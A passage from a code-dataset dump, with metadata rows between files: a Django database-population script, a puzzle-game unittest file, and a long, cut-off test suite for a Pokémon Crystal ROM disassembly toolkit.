parser.add_argument('--pred_bio_path')
args = parser.parse_args()
evaluation(args.gt_bio_path, args.pred_bio_path)
| UTF-8 | Python | false | false | 1,015 | py | 6 | evaluation.py | 5 | 0.649261 | 0.642365 | 0 | 31 | 31.741935 | 118 |
pandrian75/pastiche | 14,645,838,516,754 | 35149e7df278e3a0dcebb329d51dc33ebd6490b2 | f3fd212093c372ba4da2ef3644eb65bf454616ba | /populate_db.py | 3f4be66a3e394b0739de4abf622aa7a3e1e565b0 | [] | no_license | https://github.com/pandrian75/pastiche | 00ffb57fc5bba97aa190a44f59257b124e18a5fa | 0422dd6fed6f7d5660256be602eade00b0f35d53 | refs/heads/master | 2016-08-09T14:33:17.180641 | 2008-07-31T07:53:16 | 2008-07-31T07:53:16 | 50,779,665 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
import pastiche
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'pastiche.settings'
from datetime import datetime
from dada.models import Item, Event, Link, Location, Note, Tag, Task
from django.contrib.auth.models import User
def empty_table(table):
for o in table.objects.all():
o.delete()
##empty_table(Item)
##empty_table(Node)
#empty_table(Note)
#empty_table(Link)
#empty_table(Location)
#empty_table(Tag)
##empty_table(Task) # TODO: probably need to delete according to hierarchy, recursively
##empty_table(Event) # TODO: same
u1 = User.objects.get(username='andre')
t1 = Task()
t1.title = 'first task'
t1.user = u1
t1.save()
t2 = Task()
t2.user = u1
t2.parent = t1
t2.title = 'second task'
t2.save()
t3 = Task()
t3.user = u1
t3.parent = t1
t3.title = 'third task'
t3.due = datetime.now()
t3.save()
t4 = Task()
t4.user = u1
t4.parent = t2
t4.title = 'fourth task'
t4.done = True
t4.save()
e1 = Event()
e1.title = 'first event'
e1.user = u1
e1.rating = 4
e1.start = datetime.now()
e1.stop = datetime(2008, 10, 31, 12, 34, 56)
e1.save()
e2 = Event()
e2.title = 'second event'
e2.user = u1
e2.rating = 2
e2.start = datetime.now()
e2.stop = datetime(2008, 10, 31, 12, 34, 56)
e2.save()
e3 = Event()
e3.title = 'first subevent'
e3.user = u1
e3.parent = e2
e3.start = datetime.now()
e3.stop = datetime(2008, 9, 18, 12, 34, 56)
e3.save()
e4 = Event()
e4.title = 'second subevent'
e4.user = u1
e4.parent = e2
e4.start = datetime(2008, 9, 18, 12, 34, 56)
e4.stop = datetime(2008, 10, 31, 12, 34, 56)
e4.save()
l1 = Link()
l1.title = 'first link'
l1.user = u1
l1.private = True
l1.url = 'http://pastiche.info'
l1.save()
n1 = Note()
n1.title = 'first note'
n1.user = u1
n1.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n1.owner = l1 # add owner to note
n1.save()
n2 = Note()
n2.title = 'second note'
n2.user = u1
n2.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n2.save()
l2 = Link()
l2.title = 'second link'
l2.user = u1
l2.private = True
l2.url = 'http://pastiche.info'
l2.save()
l2.annotations.add(n2) # add note to owner (after save!)
l3 = Link()
l3.title = 'third link'
l3.user = u1
l3.url = 'http://pastiche.info'
l3.owner = t1
l3.save()
l4 = Link()
l4.title = 'fourth link'
l4.user = u1
l4.url = 'http://pastiche.info'
l4.owner = t1
l4.save()
l5 = Link()
l5.title = 'fifth link'
l5.user = u1
l5.url = 'http://pastiche.info'
l5.save()
n3 = Note()
n3.title = 'third note'
n3.user = u1
n3.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n3.owner = t1
n3.save()
n4 = Note()
n4.title = 'fourth note'
n4.user = u1
n4.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n4.owner = t3
n4.save()
n5 = Note()
n5.title = 'fifth note'
n5.user = u1
n5.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n5.owner = e2
n5.save()
n6 = Note()
n6.title = 'sixth note'
n6.user = u1
n6.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n6.owner = e4
n6.save()
n7 = Note()
n7.title = 'seventh note'
n7.user = u1
n7.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n7.save()
n8 = Note()
n8.title = 'eighth note'
n8.user = u1
n8.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n8.owner = l5
n8.save()
h1 = Item()
h1.user = u1
h1.title = 'Bookmarks'
h1.save()
l6 = Link()
l6.title = 'first bookmark'
l6.user = u1
l6.url = 'http://pastiche.info'
l6.parent = h1
l6.save()
l7 = Link()
l7.title = 'second bookmark'
l7.user = u1
l7.url = 'http://pastiche.info'
l7.parent = h1
l7.save()
h2 = Item()
h2.user = u1
h2.title = 'More Bookmarks'
h2.parent = h1
h2.save()
l8 = Link()
l8.title = 'third bookmark'
l8.user = u1
l8.url = 'http://pastiche.info'
l8.parent = h2
l8.save()
l9 = Link()
l9.title = 'fourth bookmark'
l9.user = u1
l9.url = 'http://pastiche.info'
l9.parent = h2
l9.save()
print 'db populated.'
###
#t = SimpleTask()
#t.title = 'first task'
#t.done = False
#t.save()
#n = SimpleNote()
#n.title = 'first note'
#n.text = "just some text for this note."
#n.owner = t
#n.save()
##t.annotations.add(n)
#n.owner
#n.owner.title
#t.notes
#t.notes.count()
#t.notes.all()[0].title
| UTF-8 | Python | false | false | 4,582 | py | 14 | populate_db.py | 6 | 0.639241 | 0.579005 | 0 | 228 | 18.096491 | 93 |
fran757/tdlog | 2,516,850,876,334 | 21cab59ab42aacf10e899abbcccb6f43b42c65e0 | 477f1c24269b0c6f4a2ae58569bcb2d21b07a2d2 | /test_game.py | 5653216af8cf36705011d864c66c3d66144e4d66 | [] | no_license | https://github.com/fran757/tdlog | 9a9f368ad3fe1e798f3a2770e03f529e5fa7a5b4 | 74f7b2251de916f3dc870aacd7d701e599004c5d | refs/heads/master | 2022-04-06T02:25:18.065547 | 2020-02-04T10:21:20 | 2020-02-04T10:21:20 | 218,588,437 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import unittest
from model import Grid
from control import Game
def fixture_name(name):
"""return appropriate filename"""
return os.getcwd() + "/fixtures/" + name + ".txt"
def build_fixture(name):
"""build game from fixture name"""
return Game(Grid(fixture_name(name)), None)
def extract_fixture(name):
"""extract fixture data"""
data = []
with open(fixture_name(name)) as fixture:
for line in fixture:
data.append(line)
return data
def repr_fixture(name):
"""return repr of fixture"""
with open(fixture_name(name)) as fixture:
return "".join(["".join(line) for line in fixture])
def write_fixture(data):
"""write fixture to tmp file"""
with open(fixture_name("tmp"), "w") as tmp_file:
print(data, file=tmp_file)
def expectation(move, expected):
"""Give fixture comparison result and related error message."""
value = extract_fixture("tmp") == extract_fixture(expected)
message = "Grid is not as expected after {} :\n".format(move) + repr_fixture("tmp")
return value, message
class GlobalTest(unittest.TestCase):
def test_all(self):
"""tests :
moving to empty cell
moving into cell
switching character
turning turnstile
blocked turnstile
pushing crate into hole
falling into hole
"""
self.game = build_fixture("../model/grid")
move = "1vv2^>3>>>"
self.game.process_input(move)
write_fixture(str(self.game.grid))
self.assertTrue(*expectation(move, "global"))
if __name__ == "__main__":
unittest.main()
| UTF-8 | Python | false | false | 1,648 | py | 16 | test_game.py | 15 | 0.621966 | 0.620146 | 0 | 64 | 24.75 | 87 |
kanzure/pokecrystal-demo | 386,547,101,625 | b1a1a3a31aa41d6534dd4c81b67284836e479d71 | 77aef3246236c192850e419eb04c6fae0a7697ba | /extras/tests.py | 61f46d6cb8d6f8f859f6b5682bd2c0dc608efe5e | [] | no_license | https://github.com/kanzure/pokecrystal-demo | ce61540f8d0fff4ddd253d15f9718201ef838b23 | 9ec5b0d12b1b3c0e164cb41cca8442989b3ada66 | refs/heads/master | 2016-09-06T21:34:58.619212 | 2013-05-16T13:58:10 | 2013-05-16T13:58:10 | 9,989,839 | 3 | 2 | null | false | 2013-05-16T13:58:11 | 2013-05-10T20:33:17 | 2013-05-16T13:58:10 | 2013-05-16T13:58:10 | 404 | null | 7 | 5 | Assembly | null | null | # -*- coding: utf-8 -*-
import os
import sys
import inspect
from copy import copy
import hashlib
import random
import json
from interval_map import IntervalMap
from chars import chars, jap_chars
from romstr import (
RomStr,
AsmList,
)
from item_constants import (
item_constants,
find_item_label_by_id,
generate_item_constants,
)
from pointers import (
calculate_bank,
calculate_pointer,
)
from pksv import (
pksv_gs,
pksv_crystal,
)
from labels import (
remove_quoted_text,
line_has_comment_address,
line_has_label,
get_label_from_line,
)
from crystal import (
rom,
load_rom,
rom_until,
direct_load_rom,
parse_script_engine_script_at,
parse_text_engine_script_at,
parse_text_at2,
find_all_text_pointers_in_script_engine_script,
SingleByteParam,
HexByte,
MultiByteParam,
PointerLabelParam,
ItemLabelByte,
DollarSignByte,
DecimalParam,
rom_interval,
map_names,
Label,
scan_for_predefined_labels,
all_labels,
write_all_labels,
parse_map_header_at,
old_parse_map_header_at,
process_00_subcommands,
parse_all_map_headers,
translate_command_byte,
map_name_cleaner,
load_map_group_offsets,
load_asm,
asm,
is_valid_address,
index,
how_many_until,
grouper,
get_pokemon_constant_by_id,
generate_map_constant_labels,
get_map_constant_label_by_id,
get_id_for_map_constant_label,
calculate_pointer_from_bytes_at,
isolate_incbins,
process_incbins,
get_labels_between,
generate_diff_insert,
find_labels_without_addresses,
rom_text_at,
get_label_for,
split_incbin_line_into_three,
reset_incbins,
)
# for testing all this crap
try:
import unittest2 as unittest
except ImportError:
import unittest
# check for things we need in unittest
if not hasattr(unittest.TestCase, 'setUpClass'):
sys.stderr.write("The unittest2 module or Python 2.7 is required to run this script.")
sys.exit(1)
class TestCram(unittest.TestCase):
"this is where i cram all of my unit tests together"
@classmethod
def setUpClass(cls):
global rom
cls.rom = direct_load_rom()
rom = cls.rom
@classmethod
def tearDownClass(cls):
del cls.rom
def test_generic_useless(self):
"do i know how to write a test?"
self.assertEqual(1, 1)
def test_map_name_cleaner(self):
name = "hello world"
cleaned_name = map_name_cleaner(name)
self.assertNotEqual(name, cleaned_name)
self.failUnless(" " not in cleaned_name)
name = "Some Random Pokémon Center"
cleaned_name = map_name_cleaner(name)
self.assertNotEqual(name, cleaned_name)
self.failIf(" " in cleaned_name)
self.failIf("é" in cleaned_name)
def test_grouper(self):
data = range(0, 10)
groups = grouper(data, count=2)
self.assertEquals(len(groups), 5)
data = range(0, 20)
groups = grouper(data, count=2)
self.assertEquals(len(groups), 10)
self.assertNotEqual(data, groups)
self.assertNotEqual(len(data), len(groups))
def test_direct_load_rom(self):
rom = self.rom
self.assertEqual(len(rom), 2097152)
self.failUnless(isinstance(rom, RomStr))
def test_load_rom(self):
global rom
rom = None
load_rom()
self.failIf(rom == None)
rom = RomStr(None)
load_rom()
self.failIf(rom == RomStr(None))
def test_load_asm(self):
asm = load_asm()
joined_lines = "\n".join(asm)
self.failUnless("SECTION" in joined_lines)
self.failUnless("bank" in joined_lines)
self.failUnless(isinstance(asm, AsmList))
def test_rom_file_existence(self):
"ROM file must exist"
self.failUnless("baserom.gbc" in os.listdir("../"))
def test_rom_md5(self):
"ROM file must have the correct md5 sum"
rom = self.rom
correct = "9f2922b235a5eeb78d65594e82ef5dde"
md5 = hashlib.md5()
md5.update(rom)
md5sum = md5.hexdigest()
self.assertEqual(md5sum, correct)
def test_bizarre_http_presence(self):
rom_segment = self.rom[0x112116:0x112116+8]
self.assertEqual(rom_segment, "HTTP/1.0")
def test_rom_interval(self):
address = 0x100
interval = 10
correct_strings = ['0x0', '0xc3', '0x6e', '0x1', '0xce',
'0xed', '0x66', '0x66', '0xcc', '0xd']
byte_strings = rom_interval(address, interval, strings=True)
self.assertEqual(byte_strings, correct_strings)
correct_ints = [0, 195, 110, 1, 206, 237, 102, 102, 204, 13]
ints = rom_interval(address, interval, strings=False)
self.assertEqual(ints, correct_ints)
def test_rom_until(self):
address = 0x1337
byte = 0x13
bytes = rom_until(address, byte, strings=True)
self.failUnless(len(bytes) == 3)
self.failUnless(bytes[0] == '0xd5')
bytes = rom_until(address, byte, strings=False)
self.failUnless(len(bytes) == 3)
self.failUnless(bytes[0] == 0xd5)
def test_how_many_until(self):
how_many = how_many_until(chr(0x13), 0x1337)
self.assertEqual(how_many, 3)
def test_calculate_bank(self):
self.failUnless(calculate_bank(0x8000) == 2)
self.failUnless(calculate_bank("0x9000") == 2)
self.failUnless(calculate_bank(0) == 0)
for address in [0x4000, 0x5000, 0x6000, 0x7000]:
self.assertRaises(Exception, calculate_bank, address)
def test_calculate_pointer(self):
# for offset <= 0x4000
self.assertEqual(calculate_pointer(0x0000), 0x0000)
self.assertEqual(calculate_pointer(0x3FFF), 0x3FFF)
# for 0x4000 <= offset <= 0x7FFFF
self.assertEqual(calculate_pointer(0x430F, bank=5), 0x1430F)
# for offset >= 0x7FFF
self.assertEqual(calculate_pointer(0x8FFF, bank=6), calculate_pointer(0x8FFF, bank=7))
def test_calculate_pointer_from_bytes_at(self):
addr1 = calculate_pointer_from_bytes_at(0x100, bank=False)
self.assertEqual(addr1, 0xc300)
addr2 = calculate_pointer_from_bytes_at(0x100, bank=True)
self.assertEqual(addr2, 0x2ec3)
def test_rom_text_at(self):
self.assertEquals(rom_text_at(0x112116, 8), "HTTP/1.0")
def test_translate_command_byte(self):
self.failUnless(translate_command_byte(crystal=0x0) == 0x0)
self.failUnless(translate_command_byte(crystal=0x10) == 0x10)
self.failUnless(translate_command_byte(crystal=0x40) == 0x40)
self.failUnless(translate_command_byte(gold=0x0) == 0x0)
self.failUnless(translate_command_byte(gold=0x10) == 0x10)
self.failUnless(translate_command_byte(gold=0x40) == 0x40)
self.assertEqual(translate_command_byte(gold=0x0), translate_command_byte(crystal=0x0))
self.failUnless(translate_command_byte(gold=0x52) == 0x53)
self.failUnless(translate_command_byte(gold=0x53) == 0x54)
self.failUnless(translate_command_byte(crystal=0x53) == 0x52)
self.failUnless(translate_command_byte(crystal=0x52) == None)
self.assertRaises(Exception, translate_command_byte, None, gold=0xA4)
def test_pksv_integrity(self):
"does pksv_gs look okay?"
self.assertEqual(pksv_gs[0x00], "2call")
self.assertEqual(pksv_gs[0x2D], "givepoke")
self.assertEqual(pksv_gs[0x85], "waitbutton")
self.assertEqual(pksv_crystal[0x00], "2call")
self.assertEqual(pksv_crystal[0x86], "waitbutton")
self.assertEqual(pksv_crystal[0xA2], "credits")
def test_chars_integrity(self):
self.assertEqual(chars[0x80], "A")
self.assertEqual(chars[0xA0], "a")
self.assertEqual(chars[0xF0], "¥")
self.assertEqual(jap_chars[0x44], "ぱ")
def test_map_names_integrity(self):
def map_name(map_group, map_id): return map_names[map_group][map_id]["name"]
self.assertEqual(map_name(2, 7), "Mahogany Town")
self.assertEqual(map_name(3, 0x34), "Ilex Forest")
self.assertEqual(map_name(7, 0x11), "Cerulean City")
def test_load_map_group_offsets(self):
addresses = load_map_group_offsets()
self.assertEqual(len(addresses), 26, msg="there should be 26 map groups")
addresses = load_map_group_offsets()
self.assertEqual(len(addresses), 26, msg="there should still be 26 map groups")
self.assertIn(0x94034, addresses)
for address in addresses:
self.assertGreaterEqual(address, 0x4000)
self.failIf(0x4000 <= address <= 0x7FFF)
self.failIf(address <= 0x4000)
def test_index(self):
self.assertTrue(index([1,2,3,4], lambda f: True) == 0)
self.assertTrue(index([1,2,3,4], lambda f: f==3) == 2)
def test_get_pokemon_constant_by_id(self):
x = get_pokemon_constant_by_id
self.assertEqual(x(1), "BULBASAUR")
self.assertEqual(x(151), "MEW")
self.assertEqual(x(250), "HO_OH")
def test_find_item_label_by_id(self):
x = find_item_label_by_id
self.assertEqual(x(249), "HM_07")
self.assertEqual(x(173), "BERRY")
self.assertEqual(x(45), None)
def test_generate_item_constants(self):
x = generate_item_constants
r = x()
self.failUnless("HM_07" in r)
self.failUnless("EQU" in r)
def test_get_label_for(self):
global all_labels
temp = copy(all_labels)
# this is basd on the format defined in get_labels_between
all_labels = [{"label": "poop", "address": 0x5,
"offset": 0x5, "bank": 0,
"line_number": 2
}]
self.assertEqual(get_label_for(5), "poop")
all_labels = temp
    def test_generate_map_constant_labels(self):
        # first two generated map constants must match the known map order
        ids = generate_map_constant_labels()
        self.assertEqual(ids[0]["label"], "OLIVINE_POKECENTER_1F")
        self.assertEqual(ids[1]["label"], "OLIVINE_GYM")
    def test_get_id_for_map_constant_label(self):
        # label -> numeric id, using freshly generated map_internal_ids
        global map_internal_ids
        map_internal_ids = generate_map_constant_labels()
        self.assertEqual(get_id_for_map_constant_label("OLIVINE_GYM"), 1)
        self.assertEqual(get_id_for_map_constant_label("OLIVINE_POKECENTER_1F"), 0)
    def test_get_map_constant_label_by_id(self):
        # numeric id -> label; inverse of get_id_for_map_constant_label
        global map_internal_ids
        map_internal_ids = generate_map_constant_labels()
        self.assertEqual(get_map_constant_label_by_id(0), "OLIVINE_POKECENTER_1F")
        self.assertEqual(get_map_constant_label_by_id(1), "OLIVINE_GYM")
    def test_is_valid_address(self):
        # valid ROM addresses run from 0 up to and including 0x200000 (2097152)
        self.assertTrue(is_valid_address(0))
        self.assertTrue(is_valid_address(1))
        self.assertTrue(is_valid_address(10))
        self.assertTrue(is_valid_address(100))
        self.assertTrue(is_valid_address(1000))
        self.assertTrue(is_valid_address(10000))
        self.assertFalse(is_valid_address(2097153))
        self.assertFalse(is_valid_address(2098000))
        # randomized sweep over the valid range [0, 2097152]
        addresses = [random.randrange(0,2097153) for i in range(0, 9+1)]
        for address in addresses:
            self.assertTrue(is_valid_address(address))
class TestIntervalMap(unittest.TestCase):
    """Tests for IntervalMap: a mapping from half-open integer ranges to values."""
    def test_intervals(self):
        # values are looked up by point; later assignments overwrite overlaps
        i = IntervalMap()
        first = "hello world"
        second = "testing 123"
        i[0:5] = first
        i[5:10] = second
        self.assertEqual(i[0], first)
        self.assertEqual(i[1], first)
        self.assertNotEqual(i[5], first)
        self.assertEqual(i[6], second)
        i[3:10] = second
        self.assertEqual(i[3], second)
        self.assertNotEqual(i[4], first)
    def test_items(self):
        # items() yields ((start, end), value) pairs in range order
        i = IntervalMap()
        first = "hello world"
        second = "testing 123"
        i[0:5] = first
        i[5:10] = second
        results = list(i.items())
        self.failUnless(len(results) == 2)
        self.assertEqual(results[0], ((0, 5), "hello world"))
        self.assertEqual(results[1], ((5, 10), "testing 123"))
class TestRomStr(unittest.TestCase):
    """RomStr is a class that should act exactly like str()
    except that it never shows the contents of it string
    unless explicitly forced"""
    sample_text = "hello world!"
    sample = None
    def setUp(self):
        # build the shared RomStr sample once, lazily, at class level
        if self.sample == None:
            self.__class__.sample = RomStr(self.sample_text)
    def test_equals(self):
        "check if RomStr() == str()"
        self.assertEquals(self.sample_text, self.sample)
    def test_not_equal(self):
        "check if RomStr('a') != RomStr('b')"
        self.assertNotEqual(RomStr('a'), RomStr('b'))
    def test_appending(self):
        "check if RomStr()+'a'==str()+'a'"
        self.assertEquals(self.sample_text+'a', self.sample+'a')
    def test_conversion(self):
        "check if RomStr() -> str() works"
        self.assertEquals(str(self.sample), self.sample_text)
    def test_inheritance(self):
        self.failUnless(issubclass(RomStr, str))
    def test_length(self):
        # len() and the extra .length() helper must agree
        self.assertEquals(len(self.sample_text), len(self.sample))
        self.assertEquals(len(self.sample_text), self.sample.length())
        self.assertEquals(len(self.sample), self.sample.length())
    def test_rom_interval(self):
        # interval() reads `interval` bytes starting at `address`,
        # either as hex strings or as raw ints
        global rom
        load_rom()
        address = 0x100
        interval = 10
        correct_strings = ['0x0', '0xc3', '0x6e', '0x1', '0xce',
                           '0xed', '0x66', '0x66', '0xcc', '0xd']
        byte_strings = rom.interval(address, interval, strings=True)
        self.assertEqual(byte_strings, correct_strings)
        correct_ints = [0, 195, 110, 1, 206, 237, 102, 102, 204, 13]
        ints = rom.interval(address, interval, strings=False)
        self.assertEqual(ints, correct_ints)
    def test_rom_until(self):
        # until() reads bytes from `address` up to (excluding) the sentinel byte
        global rom
        load_rom()
        address = 0x1337
        byte = 0x13
        bytes = rom.until(address, byte, strings=True)
        self.failUnless(len(bytes) == 3)
        self.failUnless(bytes[0] == '0xd5')
        bytes = rom.until(address, byte, strings=False)
        self.failUnless(len(bytes) == 3)
        self.failUnless(bytes[0] == 0xd5)
class TestAsmList(unittest.TestCase):
    """AsmList is a class that should act exactly like list()
    except that it never shows the contents of its list
    unless explicitly forced

    NOTE(review): beyond the AsmList wrapper itself, most methods in this
    class actually exercise the module-level asm-parsing helpers
    (remove_quoted_text, line_has_label, incbin processing, etc.), many of
    which communicate through the module-global `asm` list.
    """
    def test_equals(self):
        base = [1,2,3]
        asm = AsmList(base)
        self.assertEquals(base, asm)
        self.assertEquals(asm, base)
        self.assertEquals(base, list(asm))
    def test_inheritance(self):
        self.failUnless(issubclass(AsmList, list))
    def test_length(self):
        # len() and the extra .length() helper must agree
        base = range(0, 10)
        asm = AsmList(base)
        self.assertEquals(len(base), len(asm))
        self.assertEquals(len(base), asm.length())
        self.assertEquals(len(base), len(list(asm)))
        self.assertEquals(len(asm), asm.length())
    def test_remove_quoted_text(self):
        # strips both double- and single-quoted spans from a line
        x = remove_quoted_text
        self.assertEqual(x("hello world"), "hello world")
        self.assertEqual(x("hello \"world\""), "hello ")
        input = 'hello world "testing 123"'
        self.assertNotEqual(x(input), input)
        input = "hello world 'testing 123'"
        self.assertNotEqual(x(input), input)
        self.failIf("testing" in x(input))
    def test_line_has_comment_address(self):
        # an "address comment" is a ; followed by a hex/banked address;
        # quoted text must not be mistaken for one
        x = line_has_comment_address
        self.assertFalse(x(""))
        self.assertFalse(x(";"))
        self.assertFalse(x(";;;"))
        self.assertFalse(x(":;"))
        self.assertFalse(x(":;:"))
        self.assertFalse(x(";:"))
        self.assertFalse(x(" "))
        self.assertFalse(x("".join(" " * 5)))
        self.assertFalse(x("".join(" " * 10)))
        self.assertFalse(x("hello world"))
        self.assertFalse(x("hello_world"))
        self.assertFalse(x("hello_world:"))
        self.assertFalse(x("hello_world:;"))
        self.assertFalse(x("hello_world: ;"))
        self.assertFalse(x("hello_world: ; "))
        self.assertFalse(x("hello_world: ;" + "".join(" " * 5)))
        self.assertFalse(x("hello_world: ;" + "".join(" " * 10)))
        self.assertTrue(x(";1"))
        self.assertTrue(x(";F"))
        self.assertTrue(x(";$00FF"))
        self.assertTrue(x(";0x00FF"))
        self.assertTrue(x("; 0x00FF"))
        self.assertTrue(x(";$3:$300"))
        self.assertTrue(x(";0x3:$300"))
        self.assertTrue(x(";$3:0x300"))
        self.assertTrue(x(";3:300"))
        self.assertTrue(x(";3:FFAA"))
        self.assertFalse(x('hello world "how are you today;0x1"'))
        self.assertTrue(x('hello world "how are you today:0x1";1'))
        # when `returnable` is given, the parsed absolute address
        # (bank * 0x4000 + offset) is written into it
        returnable = {}
        self.assertTrue(x("hello_world: ; 0x4050", returnable=returnable, bank=5))
        self.assertTrue(returnable["address"] == 0x14050)
    def test_line_has_label(self):
        x = line_has_label
        self.assertTrue(x("hi:"))
        self.assertTrue(x("Hello: "))
        self.assertTrue(x("MyLabel: ; test xyz"))
        self.assertFalse(x(":"))
        self.assertFalse(x(";HelloWorld:"))
        self.assertFalse(x("::::"))
        self.assertFalse(x(":;:;:;:::"))
    def test_get_label_from_line(self):
        # returns the label name without the colon, or None if no label
        x = get_label_from_line
        self.assertEqual(x("HelloWorld: "), "HelloWorld")
        self.assertEqual(x("HiWorld:"), "HiWorld")
        self.assertEqual(x("HiWorld"), None)
    def test_find_labels_without_addresses(self):
        # operates on the module-global asm; labels whose comment lacks an
        # address are reported
        global asm
        asm = ["hello_world: ; 0x1", "hello_world2: ;"]
        labels = find_labels_without_addresses()
        self.failUnless(labels[0]["label"] == "hello_world2")
        asm = ["hello world: ;1", "hello_world: ;2"]
        labels = find_labels_without_addresses()
        self.failUnless(len(labels) == 0)
        asm = None
    def test_get_labels_between(self):
        global asm
        x = get_labels_between#(start_line_id, end_line_id, bank)
        asm = ["HelloWorld: ;1",
               "hi:",
               "no label on this line",
              ]
        labels = x(0, 2, 0x12)
        self.assertEqual(len(labels), 1)
        self.assertEqual(labels[0]["label"], "HelloWorld")
        del asm
    # this test takes a lot of time :(
    # (renamed with an x prefix so the loader skips it)
    def xtest_scan_for_predefined_labels(self):
        # label keys: line_number, bank, label, offset, address
        load_asm()
        all_labels = scan_for_predefined_labels()
        label_names = [x["label"] for x in all_labels]
        self.assertIn("GetFarByte", label_names)
        self.assertIn("AddNTimes", label_names)
        self.assertIn("CheckShininess", label_names)
    def test_write_all_labels(self):
        """dumping json into a file"""
        filename = "test_labels.json"
        # remove the current file
        if os.path.exists(filename):
            os.system("rm " + filename)
        # make up some labels
        labels = []
        # fake label 1
        label = {"line_number": 5, "bank": 0, "label": "SomeLabel", "address": 0x10}
        labels.append(label)
        # fake label 2
        label = {"line_number": 15, "bank": 2, "label": "SomeOtherLabel", "address": 0x9F0A}
        labels.append(label)
        # dump to file
        write_all_labels(labels, filename=filename)
        # open the file and read the contents
        file_handler = open(filename, "r")
        contents = file_handler.read()
        file_handler.close()
        # parse into json
        # NOTE(review): json.read is not the stdlib json API (stdlib is
        # json.loads) -- presumably an old third-party json module; verify
        obj = json.read(contents)
        # begin testing
        self.assertEqual(len(obj), len(labels))
        self.assertEqual(len(obj), 2)
        self.assertEqual(obj, labels)
    def test_isolate_incbins(self):
        # isolate_incbins() filters the global asm down to INCBIN lines
        global asm
        asm = ["123", "456", "789", "abc", "def", "ghi",
               'INCBIN "baserom.gbc",$12DA,$12F8 - $12DA',
               "jkl",
               'INCBIN "baserom.gbc",$137A,$13D0 - $137A']
        lines = isolate_incbins()
        self.assertIn(asm[6], lines)
        self.assertIn(asm[8], lines)
        for line in lines:
            self.assertIn("baserom", line)
    def test_process_incbins(self):
        # processed_incbins is keyed by asm line number, hence index 2 for
        # the second incbin after a non-incbin line was inserted at 1
        global incbin_lines, processed_incbins, asm
        incbin_lines = ['INCBIN "baserom.gbc",$12DA,$12F8 - $12DA',
                        'INCBIN "baserom.gbc",$137A,$13D0 - $137A']
        asm = copy(incbin_lines)
        asm.insert(1, "some other random line")
        processed_incbins = process_incbins()
        self.assertEqual(len(processed_incbins), len(incbin_lines))
        self.assertEqual(processed_incbins[0]["line"], incbin_lines[0])
        self.assertEqual(processed_incbins[2]["line"], incbin_lines[1])
    def test_reset_incbins(self):
        global asm, incbin_lines, processed_incbins
        # temporarily override the functions
        global load_asm, isolate_incbins, process_incbins
        temp1, temp2, temp3 = load_asm, isolate_incbins, process_incbins
        def load_asm(): pass
        def isolate_incbins(): pass
        def process_incbins(): pass
        # call reset
        reset_incbins()
        # check the results
        self.assertTrue(asm == [] or asm == None)
        self.assertTrue(incbin_lines == [])
        self.assertTrue(processed_incbins == {})
        # reset the original functions
        load_asm, isolate_incbins, process_incbins = temp1, temp2, temp3
    def test_find_incbin_to_replace_for(self):
        global asm, incbin_lines, processed_incbins
        asm = ['first line', 'second line', 'third line',
               'INCBIN "baserom.gbc",$90,$200 - $90',
               'fifth line', 'last line']
        isolate_incbins()
        process_incbins()
        line_num = find_incbin_to_replace_for(0x100)
        # must be the 4th line (the INBIN line)
        self.assertEqual(line_num, 3)
    def test_split_incbin_line_into_three(self):
        global asm, incbin_lines, processed_incbins
        asm = ['first line', 'second line', 'third line',
               'INCBIN "baserom.gbc",$90,$200 - $90',
               'fifth line', 'last line']
        isolate_incbins()
        process_incbins()
        content = split_incbin_line_into_three(3, 0x100, 10)
        # must end up with three INCBINs in output
        self.failUnless(content.count("INCBIN") == 3)
    def test_analyze_intervals(self):
        # analyze_intervals() returns incbins sorted largest-first
        global asm, incbin_lines, processed_incbins
        asm, incbin_lines, processed_incbins = None, [], {}
        asm = ['first line', 'second line', 'third line',
               'INCBIN "baserom.gbc",$90,$200 - $90',
               'fifth line', 'last line',
               'INCBIN "baserom.gbc",$33F,$4000 - $33F']
        isolate_incbins()
        process_incbins()
        largest = analyze_intervals()
        self.assertEqual(largest[0]["line_number"], 6)
        self.assertEqual(largest[0]["line"], asm[6])
        self.assertEqual(largest[1]["line_number"], 3)
        self.assertEqual(largest[1]["line"], asm[3])
    def test_generate_diff_insert(self):
        global asm
        asm = ['first line', 'second line', 'third line',
               'INCBIN "baserom.gbc",$90,$200 - $90',
               'fifth line', 'last line',
               'INCBIN "baserom.gbc",$33F,$4000 - $33F']
        diff = generate_diff_insert(0, "the real first line", debug=False)
        self.assertIn("the real first line", diff)
        self.assertIn("INCBIN", diff)
        self.assertNotIn("No newline at end of file", diff)
        self.assertIn("+"+asm[1], diff)
class TestMapParsing(unittest.TestCase):
    """Tests for the map-header parsing driver."""
    def test_parse_all_map_headers(self):
        # The `global` declaration makes the nested `def` below rebind the
        # module-level parse_map_header_at with a counting stub; the
        # originals are saved in temp/temp2 and restored at the end.
        global parse_map_header_at, old_parse_map_header_at, counter
        counter = 0
        for k in map_names.keys():
            if "offset" not in map_names[k].keys():
                map_names[k]["offset"] = 0
        temp = parse_map_header_at
        temp2 = old_parse_map_header_at
        def parse_map_header_at(address, map_group=None, map_id=None, debug=False):
            global counter
            counter += 1
            return {}
        old_parse_map_header_at = parse_map_header_at
        parse_all_map_headers(debug=False)
        # parse_all_map_headers is currently doing it 2x
        # because of the new/old map header parsing routines
        self.assertEqual(counter, 388 * 2)
        parse_map_header_at = temp
        old_parse_map_header_at = temp2
class TestTextScript(unittest.TestCase):
    """for testing 'in-script' commands, etc.

    Placeholder suite: the intended tests below are still commented out.
    """
    #def test_to_asm(self):
    #    pass # or raise NotImplementedError, bryan_message
    #def test_find_addresses(self):
    #    pass # or raise NotImplementedError, bryan_message
    #def test_parse_text_at(self):
    #    pass # or raise NotImplementedError, bryan_message
class TestEncodedText(unittest.TestCase):
    """for testing chars-table encoded text chunks"""
    def test_process_00_subcommands(self):
        # 601 bytes of Oak's speech split into 42 line chunks
        g = process_00_subcommands(0x197186, 0x197186+601, debug=False)
